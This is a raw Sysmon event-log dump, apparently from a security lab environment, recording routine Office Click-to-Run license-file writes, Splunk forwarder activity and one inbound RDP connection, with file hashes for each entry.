Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessRuntimeR_PrepidBypass-ul-oob.xrm-msMD5=2A22DF7DD16926C85969A52EDDBEDC85,SHA256=6318BBF441CF0651EC70F56A476F355887A5B799FBBE6199789FF5A2AEFB4304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessRuntimeR_PrepidBypass-ppd.xrm-msMD5=B1E34D177A7EE7BF3CCCC0E8C8E591F8,SHA256=35C75D0022B8E0D8D5BCB6501A3FEBA5FDC261A8B4D77E7482E5C0D8084F61AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessRuntime2019R_PrepidBypass-ul-oob.xrm-msMD5=53CB8FC345DD82F5B4318DEFDF76127F,SHA256=2309A2A21489051C7E4417707D6FB62F7FB0DC7A6B4ABCAB24261F8688562A70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessRuntime2019R_PrepidBypass-ppd.xrm-msMD5=3F56F2C8B769D69A9A88A46685C61742,SHA256=E948C5DC64658CBC0BC4C1C3B3D0E503E626C5A57C29C5E8E9EE4FD546BAE74D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019VL_MAK_AE-ul-phn.xrm-msMD5=739E626A6679CB8A3AD12CD027688B94,SHA256=A9324A654391AB75C41D3A162835FCB79433AF4088EF377CCED406CC464D8340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-msMD5=1192061D53338A8C8F0C48CCB49E306F,SHA256=7C97C3A220A36F548B4F7BF91289B70266817D248C94019FDE281D9F4E348925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019VL_MAK_AE-ppd.xrm-msMD5=3000FEC4331952F6D24537E1ECC6B2C0,SHA256=2D63A1AEDD9B073EE4A8EC8080C991E4E008727E10F1A9FEACAD30D52A6E38A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019VL_MAK_AE-pl.xrm-msMD5=75BAB6A38B0A93680C22A5C61E5B10A8,SHA256=DEB7C32A6A93D446AA8FA265745502F7AB66D29F5432D243C921D838ACEF46F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019VL_KMS_Client_AE-ul.xrm-msMD5=3427A9A983C84E57D20F03B626A78D54,SHA256=22153D1812C349AFD8FEAFE5B656F4CE1516693A79364F2DB96A96DD7C48BC9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=BF9CD4E095341D15E55E337968948A9F,SHA256=7921D4F1F661C8D23B74BBDE8258FB613E14EB78136336B6DCB760FBA9420BEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019VL_KMS_Client_AE-ppd.xrm-msMD5=1AFDDB90D0737F37A1AD53AFD06764E7,SHA256=A278D9846F854A9731FDCD57046CA56E53A169F9792CCD7EF8671013B8267112,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_Trial-ul-oob.xrm-msMD5=A15742E7A58250C31228373037EE33A7,SHA256=9980DFD6665DC30A07B6BB4D3635B3D855CE5248B8EFF438F54FAC6D84B87E4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_Trial-ppd.xrm-msMD5=C38C5BEF8EDC776AF0164742978B2319,SHA256=6637009DAF127FC382FBEBEB37CDCA6BC2BDDD7D7F2B2A5A4EA78A5655D5B7DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_Trial-pl.xrm-msMD5=68A225FF81FDC76E2A0C585F8A8A5DE8,SHA256=F11996D86621E0398F3E4534F94EB4CA6014D0A77048E8690C5522F175FE345A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_Retail-ul-phn.xrm-msMD5=C09C85991000952B55E1FC1EC7F38035,SHA256=A030E09E52131C19D6342FFF11994B0EC5075721D2CD2D136F07D96C39FFE36A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_Retail-ul-oob.xrm-msMD5=E86D6B9BE887E14A09C89571F40C7245,SHA256=563AD588FC3A98E801D2C4042DABB1803A377AD2C2D610BD981F854A12042FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_Retail-ppd.xrm-msMD5=9442619463B780F42C094DD48C251E80,SHA256=B58C1B6DFB5021E20DE8D9D54D7A227B6A445C70CD1071FAB8FFC0A9D0D009F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_Retail-pl.xrm-msMD5=744BC19EB01A9DF32433A2D1EE5AF640,SHA256=2D6FD6F3B652DF4B6EFA5266364161B59C5A7FD61D3EF67C441DB4EC1B7D6429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-msMD5=D04B501F7B75DFB7C1E8F0495F0AB791,SHA256=F04C60D415A1846030582CDD8E7F09CA906D1EE312094857AA250F849A56ABD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_OEM_Perp-ul-oob.xrm-msMD5=FC8661FACBB46BDA62C22421D22DECBB,SHA256=1EB8A03D8D42C46EC51C7B0C8DD005294D968D472259AEE9C8EFD229FE949D8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_OEM_Perp-ppd.xrm-msMD5=CE4F2C1DE98516B9E220DAE32C2974F6,SHA256=13E607C91AB104868B3018547A0B6E8C90D89A087942D656CA6C70D94862CAAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_OEM_Perp-pl.xrm-msMD5=800EF88BDC006EE8F0EBCEA4ACE9A0F4,SHA256=86DFB71A74B6CCDABE07692581B917C6246D07676A17FDC28BAB56C3AB52ED50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_Grace-ul-oob.xrm-msMD5=F0EC15EB0EDC277232AAA05BB1C6D63C,SHA256=C6EEEF16D8820A02F66C85F66A1D62C51AC43F1EB53278A25A708849167CF9BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Access2019R_Grace-ppd.xrm-msMD5=419DA88A0A2F4C37C4A9E65A0D2E93D3,SHA256=27ABD70BD421F1DEBCD58E2E49FA438F268F923910ED9F0BA3C9125BDB123222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses\c2rpridslicensefiles_auto.xmlMD5=D987A28F31634C83AB94189D105581F1,SHA256=D1891E0877F770FE63E6DF77698E79213F34CD9AF4D1F7A78A3DFA3B584FDE3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\SPPRedist.msiMD5=63A359769E597BBD46346288EF0ED318,SHA256=F470AF206DADE9E0AFC4BE5A5ED3FAC28455F02D62702B4FFA56C652A8E5985E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\QFE31928.mspMD5=75B1472EA4414D5AE7A05E373356C5B9,SHA256=EE264BAFC315929C60F1F5BF24F9730294B7939A29DC08FB0035E83E1FCE37A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.439{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5278090CF1A1164284AF1F760F49E9C,SHA256=72505470387527E8EBD063413CE0E5569491A7FA6A83B70334A2CC5142B174D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\QFE31927.mspMD5=43000EDD84BC5C7F319AFF1F0970BF64,SHA256=86B014B49F2F77BFDCA2EC9E6C73ACA40365453437CFBED6E90E899CEE751598,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049727Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:11.289{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64825-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049726Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:13.549{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDE00162D2C6BFAEF908571CD8FD70E4,SHA256=C9BD9FDE1E6F9D735A57C5147D7A82AF789F083B41BB0EE2F67C5E348E8EC5DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdXC2RVL_MAKC2R-ul-oob.xrm-msMD5=EFCDBBB5FFDE81AEF9092F331CD40886,SHA256=797D6E5FA3AEA7C17E479D188D35B4DF0493B5809879C4FE043B0B4AD5871314,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdXC2RVL_MAKC2R-ppd.xrm-msMD5=2482933068C33D9A267C8D0F7470F5BB,SHA256=AE1CE0FFEDE17C05903A813EEE82A3BF1CAD690EB0C323871E7442A7CF2C2D45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdXC2RVL_MAKC2R-pl.xrm-msMD5=A1EAC20B46AC47A4367268978E6AA4F5,SHA256=0F332435CC8D44C339F489EC130F9800755E805AB16CDEC23D6B1AE812BC62DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ul.xrm-msMD5=7BA688BF62D69A0F4A3102A8123DBD9E,SHA256=E875AC2F67BE3A683D1D3DA412DFA69CB74C77C1C81F3C66EE0C097BD1FAFAAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ul-oob.xrm-msMD5=6E71B655F9B60A9E2ED00FECAD8D6612,SHA256=F1E409E5D44084AD43FAF66A7C929A85D2C15585EC7DBD474803A4C87FF421C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ppd.xrm-msMD5=0C7AFDFDAC4446FC3040797803392659,SHA256=C268C3655CB317E58868F3AADA5556954E22940F9485EDCE04114EEE44CC8AB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdVL_MAK-ul-phn.xrm-msMD5=9987345DB9E5A2417D1460288D2F77AD,SHA256=C1F8BD8DF02F95750251C11C589F2E10A131B7AE3D6D1D8217051127A7761DA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdVL_MAK-ul-oob.xrm-msMD5=55AB5A1743B3E3E3750DA20892135E0E,SHA256=BFD2A56DB7AA07B8827E300FF89CECF3EB2352D2DB62104D8C7F65C8F12F707F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdVL_MAK-ppd.xrm-msMD5=61B9E9758BBF169158BF24D723567EA2,SHA256=18460AAF95168528A0C92D0D0964867E0404A30AF2CE843E143F6EFFCA89D834,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdVL_MAK-pl.xrm-msMD5=87E95B5EC2493E25F915CCB86C0C06C7,SHA256=ADFB23711C10776B28F8D79508DB81A407BFDA128C9C6436F6C03FEE7919F3C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdVL_KMS_Client-ul.xrm-msMD5=9F633C6D94F73735FF84C34BA5181C43,SHA256=4E2A6B69691FAA722772AC640173A829E99C23B75FE04AEF2155DB5C5591CBF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdVL_KMS_Client-ul-oob.xrm-msMD5=4B206C44038251EE3F468E4753FC4831,SHA256=AB3A79352393871A173111BBC634C4AF9A97923BDD6617BE10BF6BAAC78E27DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdVL_KMS_Client-ppd.xrm-msMD5=77BB02DF31F278B001F4646AFF0522E9,SHA256=1E133B506E7F0FE93C65A67A039994AA5F872B3E1F6251A33CA98C56CC47FB3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_Retail-ul-phn.xrm-msMD5=EC83C7FA85D0A6B5B5F3A181D52F09DF,SHA256=B3681945895126769EDB5CB20FA111B7ADEC86457C9507500E106122B663637F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 